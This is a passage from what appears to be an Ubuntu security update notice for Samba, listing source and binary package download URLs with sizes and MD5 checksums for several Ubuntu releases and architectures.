2e4a432be1d531c58d1c120ffcd3a19c http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.28a.orig.tar.gz Size/MD5: 18172643 59754cb0c19da6e65c42d0a163c5885a Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc-pdf_3.0.28a-1ubuntu4.9_all.deb Size/MD5: 6622338 9380d43f5191a37cb32bcbab1bad7ae6 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc_3.0.28a-1ubuntu4.9_all.deb Size/MD5: 7009210 cc331f7f2efb8e800bbb8762b37e25e0 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.0.28a-1ubuntu4.9_amd64.deb Size/MD5: 520546 b4b1240a3ff4d40a83f78a07c443c0f3 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.28a-1ubuntu4.9_amd64.deb Size/MD5: 1292542 3bb97eca27dadd4722adb044a40adee5 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.28a-1ubuntu4.9_amd64.deb Size/MD5: 967892 bc14c1047fbf66c1925e0c882ba92ee7 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.0.28a-1ubuntu4.9_amd64.deb Size/MD5: 3058802 f54479769002e9afe5e91ee46ae5ff41 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.0.28a-1ubuntu4.9_amd64.deb Size/MD5: 20893780 4edd6952575bc8c73d1d36d41ecbb479 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.28a-1ubuntu4.9_amd64.deb Size/MD5: 4194456 879f5a1f38a4fe9578a8a0493d522162 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.0.28a-1ubuntu4.9_amd64.deb Size/MD5: 5304436 3eb8858a5b14da4623dd48bf10f9fb73 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.0.28a-1ubuntu4.9_amd64.deb Size/MD5: 430122 fe85b84ec13ae940f9d2768464d709a4 http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.0.28a-1ubuntu4.9_amd64.deb Size/MD5: 1048832 f6895c2fa5b41dbd8eba7d88194abf41 http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.0.28a-1ubuntu4.9_amd64.deb Size/MD5: 2473112 74df91dbdde172e3899b100652695a45 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.0.28a-1ubuntu4.9_i386.deb Size/MD5: 472252 15042a9ebf034ea53ba563c791763385 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.28a-1ubuntu4.9_i386.deb Size/MD5: 1201976 727bb81955ba29c4c41bf874c47d14b1 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.28a-1ubuntu4.9_i386.deb Size/MD5: 887392 ff28ffd04701e889014f83c492e8a992 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.0.28a-1ubuntu4.9_i386.deb Size/MD5: 2840618 9bd4fdf53cd7b0b0b3bb4b3ec434fef9 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.0.28a-1ubuntu4.9_i386.deb Size/MD5: 20216796 ced1db63e3cb543459c4cdb7f10a1bdf http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.28a-1ubuntu4.9_i386.deb Size/MD5: 3840538 2cd8ab43090b315d116894170ec96d66 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.0.28a-1ubuntu4.9_i386.deb Size/MD5: 4863560 3898e31536f87d7dde65502d17ce05b6 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.0.28a-1ubuntu4.9_i386.deb Size/MD5: 397132 250691215f69c151186945b5a55b0b98 http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.0.28a-1ubuntu4.9_i386.deb Size/MD5: 974478 dd38262a108a87c928dcc50f3389a3a9 http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.0.28a-1ubuntu4.9_i386.deb Size/MD5: 2248406 896ce555ed798423eeb88fff50eb8b30 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.0.28a-1ubuntu4.9_lpia.deb Size/MD5: 463234 08b9ee8f8361646792eb439ae045269b http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.0.28a-1ubuntu4.9_lpia.deb Size/MD5: 1168374 2e2979e9f98c9b5dd73fb6c2da0911df http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.0.28a-1ubuntu4.9_lpia.deb Size/MD5: 864522 130273d8f0f9ad49e0c383ef52fd6e1d http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.0.28a-1ubuntu4.9_lpia.deb Size/MD5: 2779576 c0d8f3966307a5858d880d033603b3f5 http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.0.28a-1ubuntu4.9_lpia.deb Size/MD5: 20585618 d36b13bf28a9a3fc131c0f33b152d47e http://ports.ubuntu.com/pool/main/s/samba/samba_3.0.28a-1ubuntu4.9_lpia.deb Size/MD5: 3756770 eca1116f745d9766285c0d0a74d5b644 http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.0.28a-1ubuntu4.9_lpia.deb Size/MD5: 4734470 762b151daed66156092d163b0f406c20 http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.0.28a-1ubuntu4.9_lpia.deb Size/MD5: 390026 dbee68f037d577cd5439719c7fb92a41 http://ports.ubuntu.com/pool/main/s/samba/swat_3.0.28a-1ubuntu4.9_lpia.deb Size/MD5: 951286 38e35eeaf91c45ca56565219149abd99 http://ports.ubuntu.com/pool/main/s/samba/winbind_3.0.28a-1ubuntu4.9_lpia.deb Size/MD5: 2195544 d64ab228f0342e4d67ec3b5f20216018 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.0.28a-1ubuntu4.9_powerpc.deb Size/MD5: 515832 2ad077d63b6144cf907ab9988baf0139 http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.0.28a-1ubuntu4.9_powerpc.deb Size/MD5: 1200004 bf7ae58acb99cc3db2fab99638c95fa9 http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.0.28a-1ubuntu4.9_powerpc.deb Size/MD5: 956626 fda0b121c55858f6b66bcacb2b0461f8 http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.0.28a-1ubuntu4.9_powerpc.deb Size/MD5: 2990960 bcb29d58590b755074a365c552136c0a http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.0.28a-1ubuntu4.9_powerpc.deb Size/MD5: 21182522 2c0803fafa6fbd40aa3e104ba56bbc0d http://ports.ubuntu.com/pool/main/s/samba/samba_3.0.28a-1ubuntu4.9_powerpc.deb Size/MD5: 4126290 ccf21a784b39e047c6dc194755fdca7d http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.0.28a-1ubuntu4.9_powerpc.deb Size/MD5: 5163400 74bd882877f5523cafc680de256290fb http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.0.28a-1ubuntu4.9_powerpc.deb Size/MD5: 431514 959ff71f764937096d6f15a655dfaee6 http://ports.ubuntu.com/pool/main/s/samba/swat_3.0.28a-1ubuntu4.9_powerpc.deb Size/MD5: 1018106 2b184bd834d898febb1ef227bfd1fb90 http://ports.ubuntu.com/pool/main/s/samba/winbind_3.0.28a-1ubuntu4.9_powerpc.deb Size/MD5: 2420168 d39a44b7f9f8e154ad1c6a7cd7c47744 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.0.28a-1ubuntu4.9_sparc.deb Size/MD5: 474682 4e2ebf556bf2aebc6ba6451f28c5b880 http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.0.28a-1ubuntu4.9_sparc.deb Size/MD5: 1264254 0e1762140c135589e5a82bb690bd7770 http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.0.28a-1ubuntu4.9_sparc.deb Size/MD5: 882412 8923f26cae63e096cbc88e036851486f http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.0.28a-1ubuntu4.9_sparc.deb Size/MD5: 2780260 1538097139e3853e5123c022bb0b0f1c http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.0.28a-1ubuntu4.9_sparc.deb Size/MD5: 18529580 59a25ca374c053660116dce03011abea http://ports.ubuntu.com/pool/main/s/samba/samba_3.0.28a-1ubuntu4.9_sparc.deb Size/MD5: 3802920 8fc30eccc623c180c4fc162102867fe1 http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.0.28a-1ubuntu4.9_sparc.deb Size/MD5: 4742870 aa4f92e69ad826b22fa1946e68e987da http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.0.28a-1ubuntu4.9_sparc.deb Size/MD5: 396682 60fdbb3079527176c177305bb648ca07 http://ports.ubuntu.com/pool/main/s/samba/swat_3.0.28a-1ubuntu4.9_sparc.deb Size/MD5: 948132 18f33ffe44b9d32f4b7cc8d8885b3dc1 http://ports.ubuntu.com/pool/main/s/samba/winbind_3.0.28a-1ubuntu4.9_sparc.deb Size/MD5: 2217900 bb8577eb34a3226359c58667ec2a9afb Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.6.diff.gz Size/MD5: 236931 4f9651b8fc38ae5775cc57b2d987f44e http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.6.dsc Size/MD5: 1902 f281832cebbef598586013098bd67400 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3.orig.tar.gz Size/MD5: 23704996 c1630a57ac0ec24bc364c6d11c93ec35 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc-pdf_3.2.3-1ubuntu3.6_all.deb Size/MD5: 6261910 503b40ccc2f657eeb7c25bac480c4bf6 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc_3.2.3-1ubuntu3.6_all.deb Size/MD5: 7955234 412fd71fd346e66011f76a5af0466398 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.6_amd64.deb Size/MD5: 639534 bbbfbbead71027d2419fcb27fba42407 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.6_amd64.deb Size/MD5: 1969252 a01c75db248048dddac69a59a81c7f89 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.6_amd64.deb Size/MD5: 1370904 0e1727442db6c636569c25822d1fdbf0 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.6_amd64.deb Size/MD5: 89560 6603c0860d68ad2819d718c6d05ec5d4 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.6_amd64.deb Size/MD5: 3817612 7784145651faa822dc74d0976a99338c http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.6_amd64.deb Size/MD5: 1994386 6a019c4493229ae31edfea3ee46cb71c http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.6_amd64.deb Size/MD5: 5805124 d1c605957d71007be0fda1a15694d518 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.6_amd64.deb Size/MD5: 4909508 1e5b668561555630f24091af0cd6d4e5 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.6_amd64.deb Size/MD5: 7176252 7aa07ad7649a4446681b76847e5f5cb7 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.6_amd64.deb Size/MD5: 1530810 d6ddcc2f344f71c83f61b9ecb7b0c5a7 http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.2.3-1ubuntu3.6_amd64.deb Size/MD5: 1113428 0379fc7d057771de7b437fecfc7966e6 http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.2.3-1ubuntu3.6_amd64.deb Size/MD5: 3351366 ee45f0cb769c6c28f8a347d34d338d7e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.6_i386.deb Size/MD5: 574924 506af0e56dff7d0fe7ab51ab469c47e6 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.6_i386.deb Size/MD5: 1845352 e6ed7ca7f84020e149e808fe64311cf3 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.6_i386.deb Size/MD5: 1218372 72aec547fa38b0a064bf0e60466fda42 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.6_i386.deb Size/MD5: 88078 ab33ce6e5cefa515a699aca9cdc461e9 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.6_i386.deb Size/MD5: 3461470 17ffeb64ecd64f184e97a943c5eb9e6e http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.6_i386.deb Size/MD5: 2078640 3c519d38299e6fdbd07f4f4d72aef95c http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.6_i386.deb Size/MD5: 5163590 5222f9aea0fdf9a2acc5d95318948284 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.6_i386.deb Size/MD5: 4369460 34806faae06578a1051d568c5cea17f9 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.6_i386.deb Size/MD5: 6405268 02e19a3061477a8811d8d25709fe53e4 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.6_i386.deb Size/MD5: 1376806 d13a79928b41c7973a1a0c1ba691a722 http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.2.3-1ubuntu3.6_i386.deb Size/MD5: 1007482 eae4a6678ae8130648a5fb572b0c8998 http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.2.3-1ubuntu3.6_i386.deb Size/MD5: 2977186 b4ee501767e1e5a49741ccbda78425d0 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.6_lpia.deb Size/MD5: 554422 ff03551a483e90441db25c4c7692cd95 http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.6_lpia.deb Size/MD5: 1769968 6ec919b02183c89b9aa80134249e4b52 http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.6_lpia.deb Size/MD5: 1161338 2516d6d888b98b3bd8a3b6d74a5937a6 http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.6_lpia.deb Size/MD5: 87506 38b8b5788656a29cb0db8a13cb8b9480 http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.6_lpia.deb Size/MD5: 3330112 84aac2e247aab6dd9efb162409f0aadc http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.6_lpia.deb Size/MD5: 2071010 56f8a2fbd9e80523ef4912c691676adf http://ports.ubuntu.com/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.6_lpia.deb Size/MD5: 4952144 af73024709a58ee64f805f77077d1364 http://ports.ubuntu.com/pool/main/s/samba/samba_3.2.3-1ubuntu3.6_lpia.deb Size/MD5: 4199086 a1f7386a5d5692d4b1e995ecd8f3bb87 http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.6_lpia.deb Size/MD5: 6137958 e0a1a5d5aec37facd2c1330cfb56dfd2 http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.6_lpia.deb Size/MD5: 1318062 bf22cc094c4e89d8770fd845e855a387 http://ports.ubuntu.com/pool/main/s/samba/swat_3.2.3-1ubuntu3.6_lpia.deb Size/MD5: 969198 83f81cfc7d9ee22b599b505ba3ae3f05 http://ports.ubuntu.com/pool/main/s/samba/winbind_3.2.3-1ubuntu3.6_lpia.deb Size/MD5: 2857452 2b48cd916e54e46d5f0452303d3851d3 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.6_powerpc.deb Size/MD5: 607408 559831ff717451c998e29d4eddb3e034 http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.6_powerpc.deb Size/MD5: 1731182 bd5a801be1d73c5ac033548987dde264 http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.6_powerpc.deb Size/MD5: 1255860 6efaefbeafe04c3103d84f2c105d1872 http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.6_powerpc.deb Size/MD5: 89508 9c3081f940474a1f415678746f6243f6 http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.6_powerpc.deb Size/MD5: 3601302 a0ce49b8f3aab2a28cb22765b063694c http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.6_powerpc.deb Size/MD5: 2059040 92ad3324c83002e8b9783960ea40a036 http://ports.ubuntu.com/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.6_powerpc.deb Size/MD5: 5477608 0e38befb17ef64fd0ced6d2643dbf8da http://ports.ubuntu.com/pool/main/s/samba/samba_3.2.3-1ubuntu3.6_powerpc.deb Size/MD5: 4641844 d31adf2bfafb586243e2faf535953e42 http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.6_powerpc.deb Size/MD5: 6659150 956f64674dd5cb7bb3f8bac62895d24d http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.6_powerpc.deb Size/MD5: 1418796 8df76629fdc1fc014f9abfa1514540cc http://ports.ubuntu.com/pool/main/s/samba/swat_3.2.3-1ubuntu3.6_powerpc.deb Size/MD5: 1046932 6fdfbbf2b39c0b4962f3831538863e78 http://ports.ubuntu.com/pool/main/s/samba/winbind_3.2.3-1ubuntu3.6_powerpc.deb Size/MD5: 3124852 6c04f13595d0573d71cde5987ac264dd sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.6_sparc.deb Size/MD5: 593506 b4870d6be6ef7a61ed6c5a2e4aeae16d http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.6_sparc.deb Size/MD5: 2008990 878258bf3efa14b921dd567103a80deb http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.6_sparc.deb Size/MD5: 1216706 c488460e14273a93f0540c84c3248cee http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.6_sparc.deb Size/MD5: 88094 3a6d77a02f0e6acaba23e4b9549e69b8 http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.6_sparc.deb Size/MD5: 3503522 8ecc0f2c8d5f4cd8e4e0c796ac5722b5 http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.6_sparc.deb Size/MD5: 2008706 4fff798d96bf44cec97af54ca04db241 http://ports.ubuntu.com/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.6_sparc.deb Size/MD5: 5332248 9d183a23e7fd5f7f3994dcb711a37e97 http://ports.ubuntu.com/pool/main/s/samba/samba_3.2.3-1ubuntu3.6_sparc.deb Size/MD5: 4505892 c62a9e2bc675ce3649466cc130add2fe http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.6_sparc.deb Size/MD5: 6450016 54ee993bca2684d4e01b9f6f5a44c85e http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.6_sparc.deb Size/MD5: 1372100 5aee6497bb5977e8e307157daba0c230 http://ports.ubuntu.com/pool/main/s/samba/swat_3.2.3-1ubuntu3.6_sparc.deb Size/MD5: 1020422 bfdb2375fc15aef8e2c9fe3a57c1af02 http://ports.ubuntu.com/pool/main/s/samba/winbind_3.2.3-1ubuntu3.6_sparc.deb Size/MD5: 3030996 c0ca89ffac33688bdfe227fe26019fe5 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.3.2-1ubuntu3.2.diff.gz Size/MD5: 246744 ae710e82bc844bc0784713c356a65fe0 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.3.2-1ubuntu3.2.dsc Size/MD5: 2101 c340588b3010c9b5a7f33001a653ffb7 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.3.2.orig.tar.gz Size/MD5: 26058163 5c5178ea2c5d9bd5f6569285f2e0e6d7 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc-pdf_3.3.2-1ubuntu3.2_all.deb Size/MD5: 6710652 9d2f3fef5b10b37a00c35671153b3632 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc_3.3.2-1ubuntu3.2_all.deb Size/MD5: 7994730 28f301eba9f060eea631aff3a1c263c2 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.3.2-1ubuntu3.2_amd64.deb Size/MD5: 646652 2d5d4e46c0aea5af01fe5e9c6bbb9b28 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.3.2-1ubuntu3.2_amd64.deb Size/MD5: 2163380 c9423c1d10a0c24318882bbf169c824b http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.3.2-1ubuntu3.2_amd64.deb Size/MD5: 1508304 23c2a769c2998d346a712858cfff8cf9 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.3.2-1ubuntu3.2_amd64.deb Size/MD5: 98292 b7c4155820c63d283d503927f9cee94a http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.3.2-1ubuntu3.2_amd64.deb Size/MD5: 4467650 c0b7ef8b7211281f0db3949011abbea1 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.3.2-1ubuntu3.2_amd64.deb Size/MD5: 36711768 99fd9b5afc6a4323e86e846cb72136b9 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.3.2-1ubuntu3.2_amd64.deb Size/MD5: 5071440 dc9efb1ace97ea837b6114f0dade6322 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.3.2-1ubuntu3.2_amd64.deb Size/MD5: 9018812 3a5e01312117b39737a09978ba9f9e43 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.3.2-1ubuntu3.2_amd64.deb Size/MD5: 1688934 59e11957943a573564aa166d4b018d3c http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.3.2-1ubuntu3.2_amd64.deb Size/MD5: 3895728 9eb9988344d07744de3eb780b4c42b4a http://security.ubuntu.com/ubuntu/pool/universe/s/samba/samba-tools_3.3.2-1ubuntu3.2_amd64.deb Size/MD5: 5713268 b9146cd614816390dcae0cc91683221b http://security.ubuntu.com/ubuntu/pool/universe/s/samba/swat_3.3.2-1ubuntu3.2_amd64.deb Size/MD5: 1542412 0c67889bbb7e28462b2124440ab654ca i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.3.2-1ubuntu3.2_i386.deb Size/MD5: 582222 0219aff733081399d32448732dd96294 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.3.2-1ubuntu3.2_i386.deb Size/MD5: 2032960 750ff75ee3478437edf9e1d19e782e27 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.3.2-1ubuntu3.2_i386.deb Size/MD5: 1347184 3775216596791dc048b765b89abb05b3 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.3.2-1ubuntu3.2_i386.deb Size/MD5: 96638 d425c4783b30a1c0ad46407cd1f04dc8 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.3.2-1ubuntu3.2_i386.deb Size/MD5: 4060442 34801ccdac63f1bdf9b10b637b1d4f6e http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.3.2-1ubuntu3.2_i386.deb Size/MD5: 34984314 e8551db86917575071e55762d87d3b85 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.3.2-1ubuntu3.2_i386.deb Size/MD5: 4527948 12e6be455b45d0ce4245ab1105a5f96c http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.3.2-1ubuntu3.2_i386.deb Size/MD5: 8097728 251cc0883c670ee19edf0078a058c852 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.3.2-1ubuntu3.2_i386.deb Size/MD5: 1521034 e3f8b5995d81ba1f6c968ac32fc0d0be http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.3.2-1ubuntu3.2_i386.deb Size/MD5: 3481570 a29f9da468b535c2da5e9923010d1d6d http://security.ubuntu.com/ubuntu/pool/universe/s/samba/samba-tools_3.3.2-1ubuntu3.2_i386.deb Size/MD5: 5099016 362165caee8cd0bba16258f66c073cc6 http://security.ubuntu.com/ubuntu/pool/universe/s/samba/swat_3.3.2-1ubuntu3.2_i386.deb Size/MD5: 1400948 84221b1da74bdb5f5787f68de8952355 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.3.2-1ubuntu3.2_lpia.deb Size/MD5: 560958 962b835eefa46cc6bde4832d0e88121f http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.3.2-1ubuntu3.2_lpia.deb Size/MD5: 1952880 f9f1fb19bb809aaa6d3aad7242a4bb72 http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.3.2-1ubuntu3.2_lpia.deb Size/MD5: 1283570 af16ecb6dfd504c40dc56317b34ce9d3 http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.3.2-1ubuntu3.2_lpia.deb Size/MD5: 95956 a768287e6b93040ef2cb35ec8e7d7d41 http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.3.2-1ubuntu3.2_lpia.deb Size/MD5: 3904320 fc222ca31831d73c84faa7d1e2490974 http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.3.2-1ubuntu3.2_lpia.deb Size/MD5: 35290838 396e2a07747efbc6823f6eec6f7edd53 http://ports.ubuntu.com/pool/main/s/samba/samba_3.3.2-1ubuntu3.2_lpia.deb Size/MD5: 4346314 6297c298aed6f3a4de613d54a1dcf749 http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.3.2-1ubuntu3.2_lpia.deb Size/MD5: 7754410 c48267678450b0603139bc08e1edbbaf http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.3.2-1ubuntu3.2_lpia.deb Size/MD5: 1456666 f9b855b88c6a45b04e707a18aa55b9e0 http://ports.ubuntu.com/pool/main/s/samba/winbind_3.3.2-1ubuntu3.2_lpia.deb Size/MD5: 3339424 5ce5bd4288830a8300a44b5c52768cf3 http://ports.ubuntu.com/pool/universe/s/samba/samba-tools_3.3.2-1ubuntu3.2_lpia.deb Size/MD5: 4890862 dd221351f63783646d4e4f22d678c055 http://ports.ubuntu.com/pool/universe/s/samba/swat_3.3.2-1ubuntu3.2_lpia.deb Size/MD5: 1346736 d51baf9446d9fd010828a0131c1d3267 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.3.2-1ubuntu3.2_powerpc.deb Size/MD5: 614320 8da8875e3c2226c83ecc5a40d97b2cb2 http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.3.2-1ubuntu3.2_powerpc.deb Size/MD5: 1900044 953213cf62382b4b8b3a45d3f7def0ee http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.3.2-1ubuntu3.2_powerpc.deb Size/MD5: 1382664 7c6ed21ea30b0ebcb0462ceb1c3f8e16 http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.3.2-1ubuntu3.2_powerpc.deb Size/MD5: 98086 c0f91f3844450ae41d6e3b0115f20591 http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.3.2-1ubuntu3.2_powerpc.deb Size/MD5: 4200232 98576bc60ab7737cb5bb547f29e1a5dc http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.3.2-1ubuntu3.2_powerpc.deb Size/MD5: 35738340 9d638bf8c1ab59847995b9ca2c55d56a http://ports.ubuntu.com/pool/main/s/samba/samba_3.3.2-1ubuntu3.2_powerpc.deb Size/MD5: 4804652 8a7d4638dac9533316b1f0a020dccd3f http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.3.2-1ubuntu3.2_powerpc.deb Size/MD5: 8333880 e1b4a75d2ad6a9725584243883312f3e http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.3.2-1ubuntu3.2_powerpc.deb Size/MD5: 1565914 